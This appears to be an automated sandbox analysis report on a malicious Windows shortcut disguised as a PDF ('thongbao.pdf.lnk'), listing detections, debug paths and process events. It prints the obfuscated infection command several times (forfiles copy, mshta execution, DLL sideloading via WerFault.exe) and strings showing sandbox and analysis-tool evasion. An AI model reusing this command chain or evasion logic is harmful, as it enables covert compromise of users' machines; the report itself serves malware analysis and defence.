Source: p3a3TSUccX.lnk |
ReversingLabs: Detection: 21% |
Source: p3a3TSUccX.lnk |
Virustotal: Detection: 34% |
Perma Link |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 81.0% probability |
Source: |
Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk |
Source: p3a3TSUccX.lnk |
String found in binary or memory: (www.facebook.com/Thich.Hoc.Chui/)Tj equals www.facebook.com (Facebook) |
Source: p3a3TSUccX.lnk |
String found in binary or memory: /kTextE [/t (www.facebook.com/Thich.Hoc.Chui/)] equals www.facebook.com (Facebook) |
Source: Yara match |
File source: p3a3TSUccX.lnk, type: SAMPLE |
Source: p3a3TSUccX.lnk |
LNK file: $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe"))) |
Source: p3a3TSUccX.lnk |
Binary or memory string: OriginalFilenameWerFault.exej% vs p3a3TSUccX.lnk |
Source: p3a3TSUccX.lnk |
Binary string: o%XApplication Error%sInPageCoFireInPageError%s\system32\cofire.exe"%s" "%s" "%s"\Device\LanmanRedirector\%s :psapi.dllGetMappedFileNameWsfc_os.dllSfcIsFileProtectedFindFirstFileNameWFindNextFileNameWwdi.dll)n3Lgg |
Source: p3a3TSUccX.lnk |
Binary string: \\?\GLOBALROOT\Device\Mup\0000da39a3ee5e6b4b0d3255bfef95601890afd80709%04d/%02d/%02d:%02d:%02d:%02dU:!W:dc.xpmoddatadc.xpmodminidc.xpmodmemdc.OnDemandKdmpdc.expmoddatadc.expmodminidc.expmodmemdc.CustomDumpdc.xpminidumpdc.xpmemdumpdc.noreflectdc.forcenativedumpttd.tmpNoReflectionAbandoning reflection due to server requestAttempting to reflect reporting process!Reflection/ReserveMachineQueueDirectory attempt failed: 0X%XReflection attempt failed: 0X%XFalling back to non-reflected dump for reflection requestAttempting to cross-proc reporting process!Open process failed unexpectedly: 0X%XOut of cross process pid spaceelevatednon-elevatedfullReserveMachineQueueDirectory failed: 0x%xKernelDump failed: 0x%xCollectCrossProcessModuleDumps failed: 0x%xCollectCrossProcessDumps failed: 0x%xTTD recording not allowed: 0x%xControl Time Travel Debugging failed: 0x%xCould not collect xproc for reflection: 0x%x.dmpCould not collect dump for reflection cross process: 0x%xtruefalseCollectReflectionDump failed with: 0x%xCould not collect dump for cross process: 0x%xCould not collect cross dump for loaded module %ws: 0x%xFound %u native processes for xproc module: %sFound %u x86 processes for xproc module: %sTTD\ |
Source: p3a3TSUccX.lnk |
Binary string: t\Device\IPTSYSTEM\CurrentControlSet\Control\WMI\Autologger\Microsoft-OCA-IPTBufferSize{C712AF3D-ED1E-46A9-B843-E9014D29CAEE}LogFileModeMinimumBuffersEnableKernelFlagsStatusStartapi-ms-win-eventing-controller-l1-1-0.dllStartTraceWMicrosoft-OCA-IPTWIN://SYSAPPIDonecore\shell\lib\calleridentity\calleridentity.cppN%\ |
Source: classification engine |
Classification label: mal84.troj.evad.winLNK@4/0@0/0 |
Source: C:\Windows\System32\conhost.exe |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\forfiles.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: p3a3TSUccX.lnk |
ReversingLabs: Detection: 21% |
Source: p3a3TSUccX.lnk |
Virustotal: Detection: 34% |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))) |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" |
Jump to behavior |
Source: C:\Windows\System32\forfiles.exe |
Section loaded: version.dll |
Jump to behavior |
Source: |
Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk |
Source: |
Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe"))) |
Source: LNK file |
Process created: C:\Windows\System32\cmd.exe |
Source: p3a3TSUccX.lnk |
Binary or memory string: INFOWERPINITIATECRASHREPORTING WAS MEOMEO!AESCHAININGMODECBCCHAININGMODEOBJECTLENGTHTCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXECONFIRMEDCHECK SIZE: %LU BYTESMY_PAYLOAD_LENERRORFAILED TO ALLOCATE MEMORYFAILED TO SET MEMORY PROTECTION[-] SANDBOX PROCESS DETECTED![+] DECRYPTING SC... |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"" |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" $r$u$n$d$l$l$3$2 $s$he$ll$3$2$.dll $$s$h$e$l$l$e$x$e$c_r$un$d$l$l "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /p c:\users\user /s /m "thongbao.pdf.lnk" /c "cmd /c copy "@path" "c:\users\user\iamhere.alf"") else (copy "%cd%\thongbao.pdf.lnk" "c:\users\user\iamhere.alf")) && m^s^h^t^a"."exe "c:\users\user\iamhere.alf" && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (timeout 5 && (if not exist "c:\users\user\appdata\roaming\lenovo\faultrep.dll" (exit) else (start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe")))else (timeout 1 && start /min "" "c:\users\user\appdata\roaming\lenovo\werfault.exe"))) |